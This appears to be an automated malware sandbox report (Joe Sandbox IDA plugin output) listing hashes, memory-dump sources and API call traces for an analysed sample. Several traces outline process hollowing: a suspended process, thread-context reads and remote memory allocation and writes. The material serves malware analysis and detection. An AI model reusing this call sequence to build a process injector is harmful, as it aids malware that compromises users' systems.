                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 13a13548b01468a0627bfc6816ce65ffb52e9b7f7dfdda236306ca4f6f7e078d
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 40526C74A01229DFDBA4CF98C984BADBBB1BF09304F1480DAE54DA7351DB30AA95DF14

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 588b91b827282762ff0e3413d3fb34452fe767bcf4e4ff453577001b041af87e
                    • Instruction ID: 8b3fa60b4c4a2a692816cab4e7a6a6305bd65271537a877a075c62ae5821928f
                    • Opcode Fuzzy Hash: 588b91b827282762ff0e3413d3fb34452fe767bcf4e4ff453577001b041af87e
                    • Instruction Fuzzy Hash: DA41D6B2E041146BDB18DBB8CC85BAEB7B5AF45324F10077EE815E33D1EA749984CB49

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004099D0: Sleep.KERNELBASE(00000064), ref: 0040A933
                      • Part of subcall function 004099D0: CreateMutexA.KERNELBASE(00000000,00000000,00463224), ref: 0040A951
                      • Part of subcall function 004099D0: GetLastError.KERNEL32 ref: 0040A959
                      • Part of subcall function 004099D0: GetLastError.KERNEL32 ref: 0040A96A
                      • Part of subcall function 00405BC0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040612D
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016B80,00000000,00000000,00000000), ref: 00416D46
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016C10,00000000,00000000,00000000), ref: 00416D57
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016CA0,00000000,00000000,00000000), ref: 00416D68
                    • Sleep.KERNEL32(00007530), ref: 00416D75
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$Thread$ErrorLastSleep$MutexOpen
                    • String ID:
                    • API String ID: 3966068485-0
                    • Opcode ID: f5d0eeff358944ea3866414c35db1e035878ca345e6e00d6db8bbff552f4029d
                    • Instruction ID: 31902ad575a48c38801987c82ff2dd8d9c076a2f2ea5494020ecf42ec81d45e6
                    • Opcode Fuzzy Hash: f5d0eeff358944ea3866414c35db1e035878ca345e6e00d6db8bbff552f4029d
                    • Instruction Fuzzy Hash: C6F0C975BD471475F13032A62C03F9A29145B04F65F320527B7587E1D299DCB4818AEF

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: runas
                    • API String ID: 3472027048-4000483414
                    • Opcode ID: f2743ec9286650c7547dc49cd350320a0fa6e1949aab133e6c86d834e3d515ba
                    • Instruction ID: 9d19d4fe5d809e0f9ff9941f70a6e5c2266b8a13b716b69cce3286adae415981
                    • Opcode Fuzzy Hash: f2743ec9286650c7547dc49cd350320a0fa6e1949aab133e6c86d834e3d515ba
                    • Instruction Fuzzy Hash: 1CE11BB1E14144ABEB08EF78CD4679E7B719F41308F50815EF411A73C6DB7DAA40879A

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00417A50: __Cnd_destroy_in_situ.LIBCPMT ref: 00417B48
                      • Part of subcall function 00417A50: __Mtx_destroy_in_situ.LIBCPMT ref: 00417B51
                    • Sleep.KERNEL32(00001388), ref: 0040C7B9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situSleep
                    • String ID:
                    • API String ID: 113500496-0
                    • Opcode ID: ad0b87b450f1baf879a39e5442e694f600d6a99994e99dd76fa00f6b0501f434
                    • Instruction ID: 9909c573ad9e99750a0bf64cc227376511406c5771d8e5e7903b78f8a5ef9b2a
                    • Opcode Fuzzy Hash: ad0b87b450f1baf879a39e5442e694f600d6a99994e99dd76fa00f6b0501f434
                    • Instruction Fuzzy Hash: 8912D371A00108DBDF04DF68C985BDDBBB5EF49304F64422EE815B72C2D739AA85CB99

                    Control-flow Graph

                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,044C0223,?,?), ref: 044C0E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,044C0223,?,?), ref: 044C0E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: dd27885c3c87af55883d42dcb9774b72eb2199495f9e01673a766c979f758aae
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 15D01235145128B7DB403AD4DC09BDE7B1CDF05B62F048011FB0DD9180C770954046E5

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D117
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileModuleName
                    • String ID:
                    • API String ID: 514040917-0
                    • Opcode ID: c60b44cba65ad7ba7fef53619f3889c2829e01807d2db3d9e810612548e0c43b
                    • Instruction ID: 7aa9eb5b4b860a37ccad2f95597d9be3fd9bbfb438b280bae5d5354745136ecf
                    • Opcode Fuzzy Hash: c60b44cba65ad7ba7fef53619f3889c2829e01807d2db3d9e810612548e0c43b
                    • Instruction Fuzzy Hash: CBE10771E002549BEB19DB78CD497DDBB71AF46308F1042DED4086B3C2DB799B888B99

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4712d49a243cdabdbad1a7b87602ae6a1777f3f552df2923a8a6ceb4cf70a86f
                    • Instruction ID: dac0f5e970660739917d7c2007d5a0deabbb8cdb447ff5b2a99196646c7ba1be
                    • Opcode Fuzzy Hash: 4712d49a243cdabdbad1a7b87602ae6a1777f3f552df2923a8a6ceb4cf70a86f
                    • Instruction Fuzzy Hash: 7B51DE70E042589BEB25DB64CD89BDEBBB1AB05304F5041EAD40867282DB795FC8CF95

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d37c009292c7d8192c68702c147d0cf0a0439ce37f54c6f001c3db6152093e29
                    • Instruction ID: c6498abaad0327c0561bb40e3dadd450b9ffb201cab76c175979097a24c33401
                    • Opcode Fuzzy Hash: d37c009292c7d8192c68702c147d0cf0a0439ce37f54c6f001c3db6152093e29
                    • Instruction Fuzzy Hash: C7318D71A10248AFEB04DF68C985BDEBBB5FF49304F10462AF815A72C1D7799980CB98
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __wsopen_s
                    • String ID:
                    • API String ID: 3347428461-0
                    • Opcode ID: 614a3e3ee89691309344d2c14c20bc16bf30284b6f7f3b8c42e64e4b54115df9
                    • Instruction ID: 2ec4cfe0dad6ab8aed3ec9bb528ac9be46e2dd1aba8fd40cc46cdcf008e8708c
                    • Opcode Fuzzy Hash: 614a3e3ee89691309344d2c14c20bc16bf30284b6f7f3b8c42e64e4b54115df9
                    • Instruction Fuzzy Hash: 84115A71A0420AAFCF09DF58E94198B7BF5EF48304F04406AF808EB311D630EE21CB69
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: e898f6e6f3fdb114fc582850e36c3fd83bcfe2d7093314ec39bec91d9d9ed899
                    • Instruction ID: 619686980a94c91a96dc5e1f64013ceebeb6e5bb181467a0b6342c5070a9d782
                    • Opcode Fuzzy Hash: e898f6e6f3fdb114fc582850e36c3fd83bcfe2d7093314ec39bec91d9d9ed899
                    • Instruction Fuzzy Hash: DE012C72C00159BFDF02AFA88C01AEE7FF5EF08314F14416AF914A2161E6358A65DB95
                    APIs
                    • CreateFileW.KERNELBASE(00000000,00000000,?,00441C05,?,?,00000000,?,00441C05,00000000,0000000C), ref: 00441832
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
                    • Instruction ID: 728716dea2d8701cc34847fc6eeab83fc4e7ccc419190b368175d6442f09313a
                    • Opcode Fuzzy Hash: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
                    • Instruction Fuzzy Hash: 10D06C3201020DBBDF028F84DC06EDE3BAAFB48715F014150BA1856020C732E861AB94
                    APIs
                    • GetFileAttributesA.KERNELBASE(?), ref: 00408789
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1c359e556df86ff6f81b295afed9701b7315f92a1b1b96a2d875eaf16d26da57
                    • Instruction ID: 789fed60249ad8487cd2233da5116ea2fb7e09c640f53059edfd99c86290eb63
                    • Opcode Fuzzy Hash: 1c359e556df86ff6f81b295afed9701b7315f92a1b1b96a2d875eaf16d26da57
                    • Instruction Fuzzy Hash: F8C0122800060046DD180A386B48455330156433757E40BA9E5F1671E5CA3D58079608
                    APIs
                    • GetFileAttributesA.KERNELBASE(?), ref: 00408789
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 91263034b88fd9d872aba8cf726a75655e3cadde92fadada609a05562aff1eac
                    • Instruction ID: d292f878e85dccc847fdb363e351687f19c9a12ceb3464221f462bb5f8416341
                    • Opcode Fuzzy Hash: 91263034b88fd9d872aba8cf726a75655e3cadde92fadada609a05562aff1eac
                    • Instruction Fuzzy Hash: 0AC0123800020086DA1C4A287B4841533119A423353F40B7DE5F1671E5CB3AC803C658
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0296007E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0295F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_295f000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 2633c43a4532ae807ef926eaf87e33ea6b8db5c09dbaa80fbfd6c2d3a4a1b401
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 1C113C79A00208EFDB01DF98C989E98BBF5AF08351F158094F9489B361D771EA50DF80
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0041C87E
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041C88C
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041C89D
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041C8AE
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041C8BF
                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0041C8D0
                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0041C8E1
                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0041C8F2
                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0041C903
                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0041C914
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0041C925
                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0041C936
                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0041C947
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0041C958
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0041C969
                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0041C97A
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0041C98B
                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0041C99C
                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0041C9AD
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0041C9BE
                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0041C9CF
                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0041C9E0
                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0041C9F1
                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0041CA02
                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0041CA13
                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0041CA24
                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0041CA35
                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0041CA46
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041CA57
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041CA68
                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0041CA79
                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0041CA8A
                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0041CA9B
                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0041CAAC
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0041CABD
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0041CACE
                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0041CADF
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0041CAF0
                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0041CB01
                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0041CB12
                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0041CB23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                    • API String ID: 667068680-295688737
                    • Opcode ID: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
                    • Instruction ID: 0f84095e92aac1c2e0bb15fd21b29d90348e2d41669b35d16af1684e6b0aebcd
                    • Opcode Fuzzy Hash: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
                    • Instruction Fuzzy Hash: 38612875952711EBD7016FB4FC0DF893AB8AA09B53B608537F906D21B2E6F88004CB6D
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040713D
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040719B
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 004071B4
                    • GetThreadContext.KERNEL32(?,00000000), ref: 004071C9
                    • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 004071E9
                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040722B
                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00407248
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00407301
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                    • String ID: $VUUU$invalid stoi argument
                    • API String ID: 3796053839-3954507777
                    • Opcode ID: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction ID: 366fe4445ccda86ac4365a5b5e7cea4355bbaaae95b1a624cf57fc235f8353fe
                    • Opcode Fuzzy Hash: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction Fuzzy Hash: 85416D75644301BFE7209F50DC06F9A7BE8BF88B15F000429F684E62D1DBB4E954CB9A
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 044C73A4
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 044C7402
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 044C741B
                    • GetThreadContext.KERNEL32(?,00000000), ref: 044C7430
                    • ReadProcessMemory.KERNEL32(?,00458E08,?,00000004,00000000), ref: 044C7450
                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 044C7492
                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 044C74AF
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 044C7568
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                    • String ID: VUUU
                    • API String ID: 3796053839-2040033107
                    • Opcode ID: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction ID: ddf1b8e083b8bc99d18df12cd1e52b4e4f6b29d6a9fda21d2478e15bddea92ea
                    • Opcode Fuzzy Hash: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction Fuzzy Hash: 47415BB9244301BFE7609F50DC06F5ABBE8BF88B15F000429B688E62D0E7B0E504CB5A
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044E128D
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044E12D9
                      • Part of subcall function 044E29D4: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 044E2AC7
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 044E1345
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044E1361
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044E13B5
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044E13E2
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 044E1438
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction ID: 07bb2031e6381815ed8b9f384fd2061dd02d3954d4e8e04a6133b4dd5d497a66
                    • Opcode Fuzzy Hash: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction Fuzzy Hash: C5B19B70A40616AFDF18CF6AC981A7EB7B4FF88305F14816ED842AB741D770B981CB95
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00421026
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00421072
                      • Part of subcall function 0042276D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00422860
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 004210DE
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 004210FA
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042114E
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042117B
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004211D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: afe0a21ddb237a3545ec7cee1ee931015f4d78d4a6e3d329f8f75f704a6fa3ae
                    • Instruction ID: 5a02515ce4d3d9bed4952b7643743e3afd61b43d92e326ff25b08a62267af8db
                    • Opcode Fuzzy Hash: afe0a21ddb237a3545ec7cee1ee931015f4d78d4a6e3d329f8f75f704a6fa3ae
                    • Instruction Fuzzy Hash: D5B18B70A00626EFCB18CF59E980B7AB7B4FF58300F54816EE901AB751D374AD91CB99
                    APIs
                      • Part of subcall function 044E3073: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 044E3086
                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 044E198B
                      • Part of subcall function 044E3186: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 044E31B0
                      • Part of subcall function 044E3186: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 044E321F
                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 044E1ABD
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 044E1B1D
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 044E1B29
                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 044E1B64
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 044E1B85
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 044E1B91
                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 044E1B9A
                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 044E1BB2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                    • String ID:
                    • API String ID: 2508902052-0
                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction ID: 2b9cc3df3638d42914e9d110f782bd07499a3cf788ddbb0d67833d56997de98e
                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
